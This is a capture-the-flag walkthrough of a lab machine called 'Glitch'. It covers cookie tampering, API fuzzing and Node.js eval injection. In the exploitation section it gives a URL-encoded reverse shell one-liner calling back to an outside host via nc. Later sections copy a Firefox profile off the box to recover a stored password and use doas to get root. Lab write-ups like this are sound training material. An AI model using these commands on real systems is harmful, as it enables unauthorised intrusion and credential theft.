Glitch

Target IP: 10.10.255.64

Challenge showcasing a web app and simple privilege escalation. Can you find the glitch?


Reconnaissance

6896242b700631ffbc94c42bb6e9a36d.png
There is only one TCP port open on the target machine: HTTP on port 80.


Enumeration

Port 80: HTTP
ccaaa2583c2c8322a6789edb1f83c55b.png
The webpage above is displayed for this web application.

43f30c7b6837c3c726972f45d25771db.png
The source-code of this webpage contains the juicy information above. JavaScript is embedded directly on the webpage and there is a function called getAccess(). This function makes a call to /api/access and it prints the response to the console.

f650da4eb0dcad6cd94aaa0b1d2f8c4a.png
I executed the getAccess() function at the console and received the token dGhpc19pc19ub3RfcmVhbA==, as shown above.

bb4e820b91afef0e68686af519bf66f4.png
Decoding the token outputs the string this_is_not_real.

01aa29cb82a014aafd139034a5760d87.png
Doing a directory search shows an interesting entry called /secret.

2eea3240e797a213a6cb2d5e77daef46.png
The /secret webpage is empty. However, I noticed I can change the cookie value. Maybe I can change it to this_is_not_real?

7a2222cca9842035289f7fb0ae201d99.png
After changing the value to this_is_not_real and refreshing the page, the content of the webpage changed to the one shown above.

125430420b68247f76460aaf18c03565.png
The default webpage of the application at port 80 also changed to the one shown above.

9ce41264cdbd2880ecb6496703f9f3e4.png
Doing a fuzz on the API shows there is another API called items.

6afc2d7ac062975700214bc76c2b1ad9.png
The contents of /api/items are shown above.

12a6a97139daeb6a51d176c036c77b52.png
Changing the GET to POST method makes the server return there_is_a_glitch_in_the_matrix message, as shown above.

54d505e940ad89e493874ef23a36af32.png
And I found cmd parameter works as the server returns the error message above. Now I can escalate this to a reverse shell connection as I know the target machine is running NodeJS and the input is being processed by the function eval.


Exploitation

16530067c22f17ed5d28e63a2c05b2c7.png
f59353f9b36c3741545740db85cc654a.png
Doing a Google search shows require("child_process").exec() can be used to obtain a reverse shell connection. I used the reverse shell rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.14.55.153%208443%20%3E%2Ftmp%2Ff with the POST method to obtain a reverse shell connection! Now I have a foothold on the target machine.


Privilege Escalation

af71ac8be75763b45e442b6bd294d1c9.png
Running the command find / -perm -u=s -type f 2>/dev/null shows /usr/local/bin/doas. However, I cannot execute this binary as the user user.

65dff438d82a5f9a60cecdb86c2c907c.png
I transferred the .firefox data to my machine using nc.

8254cf63c4c666a2ce4ab912112dac0c.png
And using the command firefox --profile b5w4643p.default-release --allow-downgrade, I obtained the password of the user v0id by opening a firefox with the user's data.

20a7aeac96cf755b2e76d0a1f570e2d3.png
And using the new password love_the_void, I successfully switched to this user v0id.

17b51a6e7a0d6371c63c1ecb1db1fa0e.png
I escalated my privileges to root by using the doas binary I encountered before. Using the command doas -u root /bin/bash, I now have a root shell.


Flags

23432f9337e7d6ecf9c0528e0c2e5413.png
The user.txt flag which is located at the home directory of user user.

1d633988421b993d85edf078442dcfa1.png
The root.txt flag.